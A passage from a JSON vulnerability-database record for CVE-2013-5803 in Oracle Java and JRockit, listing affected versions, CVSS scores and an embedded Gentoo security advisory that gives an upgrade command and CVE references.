"cpe:2.3:a:sun:jre:1.5.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update28:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update45:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update51:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.5.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update36:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update40:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "r28.2.8", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.2.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.1.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.1.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.1.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.2.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.2.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.1.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.2.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.2.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update40:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update28:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update11_b03:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update45:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update51:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.5.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update40:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update36:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2013-5803" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "123647" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123689" }, { "db": "PACKETSTORM", "id": "123942" } ], "trust": 0.4 }, "cve": "CVE-2013-5803", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 2.6, "confidentialityImpact": "NONE", "exploitabilityScore": 4.9, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "High", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 2.6, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2013-5803", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Low", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2013-5803", "trust": 1.8, "value": "LOW" }, { "author": "VULMON", "id": "CVE-2013-5803", "trust": 0.1, "value": "LOW" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-5803" }, { "db": "JVNDB", "id": "JVNDB-2013-004699" }, { "db": "NVD", "id": "CVE-2013-5803" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect availability via vectors related to JGSS. \nThe vulnerability can be exploited over the \u0027Kerberos\u0027 protocol. This issue affects the \u0027JGSS\u0027 sub-component. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201406-32\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: IcedTea JDK: Multiple vulnerabilities\n Date: June 29, 2014\n Bugs: #312297, #330205, #340819, #346799, #352035, #353418,\n #354231, #355127, #370787, #387637, #404095, #421031,\n #429522, #433389, #438750, #442478, #457206, #458410,\n #461714, #466822, #477210, #489570, #508270\n ID: 201406-32\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in the IcedTea JDK, the worst\nof which could lead to arbitrary code execution. \n\nBackground\n==========\n\nIcedTea is a distribution of the Java OpenJDK source code built with\nfree build tools. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-java/icedtea-bin \u003c 6.1.13.3 \u003e= 6.1.13.3 \n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in the IcedTea JDK. \nPlease review the CVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll IcedTea JDK users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-java/icedtea-bin-6.1.13.3\"\n\nReferences\n==========\n\n[ 1 ] CVE-2009-3555\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555\n[ 2 ] CVE-2010-2548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2548\n[ 3 ] CVE-2010-2783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2783\n[ 4 ] CVE-2010-3541\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541\n[ 5 ] CVE-2010-3548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548\n[ 6 ] CVE-2010-3549\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549\n[ 7 ] CVE-2010-3551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551\n[ 8 ] CVE-2010-3553\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553\n[ 9 ] CVE-2010-3554\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554\n[ 10 ] CVE-2010-3557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557\n[ 11 ] CVE-2010-3561\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561\n[ 12 ] CVE-2010-3562\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562\n[ 13 ] CVE-2010-3564\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3564\n[ 14 ] CVE-2010-3565\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565\n[ 15 ] CVE-2010-3566\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566\n[ 16 ] CVE-2010-3567\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567\n[ 17 ] CVE-2010-3568\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568\n[ 18 ] CVE-2010-3569\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569\n[ 19 ] CVE-2010-3573\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573\n[ 20 ] CVE-2010-3574\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574\n[ 21 ] CVE-2010-3860\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3860\n[ 22 ] CVE-2010-4351\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4351\n[ 23 ] CVE-2010-4448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448\n[ 24 ] CVE-2010-4450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450\n[ 25 ] CVE-2010-4465\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465\n[ 26 ] CVE-2010-4467\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467\n[ 27 ] CVE-2010-4469\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469\n[ 28 ] CVE-2010-4470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470\n[ 29 ] CVE-2010-4471\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471\n[ 30 ] CVE-2010-4472\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472\n[ 31 ] CVE-2010-4476\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476\n[ 32 ] CVE-2011-0025\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0025\n[ 33 ] CVE-2011-0706\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0706\n[ 34 ] CVE-2011-0815\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815\n[ 35 ] CVE-2011-0822\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0822\n[ 36 ] CVE-2011-0862\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862\n[ 37 ] CVE-2011-0864\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864\n[ 38 ] CVE-2011-0865\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865\n[ 39 ] CVE-2011-0868\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868\n[ 40 ] CVE-2011-0869\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869\n[ 41 ] CVE-2011-0870\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0870\n[ 42 ] CVE-2011-0871\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871\n[ 43 ] CVE-2011-0872\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872\n[ 44 ] CVE-2011-3389\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389\n[ 45 ] CVE-2011-3521\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521\n[ 46 ] CVE-2011-3544\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544\n[ 47 ] CVE-2011-3547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547\n[ 48 ] CVE-2011-3548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548\n[ 49 ] CVE-2011-3551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551\n[ 50 ] CVE-2011-3552\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552\n[ 51 ] CVE-2011-3553\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553\n[ 52 ] CVE-2011-3554\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554\n[ 53 ] CVE-2011-3556\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556\n[ 54 ] CVE-2011-3557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557\n[ 55 ] CVE-2011-3558\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558\n[ 56 ] CVE-2011-3560\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560\n[ 57 ] CVE-2011-3563\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563\n[ 58 ] CVE-2011-3571\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3571\n[ 59 ] CVE-2011-5035\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035\n[ 60 ] CVE-2012-0497\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497\n[ 61 ] CVE-2012-0501\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501\n[ 62 ] CVE-2012-0502\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502\n[ 63 ] CVE-2012-0503\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503\n[ 64 ] CVE-2012-0505\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505\n[ 65 ] CVE-2012-0506\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506\n[ 66 ] CVE-2012-0547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547\n[ 67 ] CVE-2012-1711\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711\n[ 68 ] CVE-2012-1713\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713\n[ 69 ] CVE-2012-1716\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716\n[ 70 ] CVE-2012-1717\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717\n[ 71 ] CVE-2012-1718\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718\n[ 72 ] CVE-2012-1719\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719\n[ 73 ] CVE-2012-1723\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723\n[ 74 ] CVE-2012-1724\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724\n[ 75 ] CVE-2012-1725\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725\n[ 76 ] CVE-2012-1726\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726\n[ 77 ] CVE-2012-3216\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216\n[ 78 ] CVE-2012-3422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3422\n[ 79 ] CVE-2012-3423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3423\n[ 80 ] CVE-2012-4416\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416\n[ 81 ] CVE-2012-4540\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4540\n[ 82 ] CVE-2012-5068\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068\n[ 83 ] CVE-2012-5069\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069\n[ 84 ] CVE-2012-5070\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070\n[ 85 ] CVE-2012-5071\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071\n[ 86 ] CVE-2012-5072\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072\n[ 87 ] CVE-2012-5073\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073\n[ 88 ] CVE-2012-5074\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074\n[ 89 ] CVE-2012-5075\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075\n[ 90 ] CVE-2012-5076\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076\n[ 91 ] CVE-2012-5077\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077\n[ 92 ] CVE-2012-5081\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081\n[ 93 ] CVE-2012-5084\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084\n[ 94 ] CVE-2012-5085\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085\n[ 95 ] CVE-2012-5086\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086\n[ 96 ] CVE-2012-5087\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087\n[ 97 ] CVE-2012-5089\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089\n[ 98 ] CVE-2012-5979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5979\n[ 99 ] CVE-2013-0169\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169\n[ 100 ] CVE-2013-0401\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401\n[ 101 ] CVE-2013-0424\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0424\n[ 102 ] CVE-2013-0425\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0425\n[ 103 ] CVE-2013-0426\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0426\n[ 104 ] CVE-2013-0427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0427\n[ 105 ] CVE-2013-0428\n 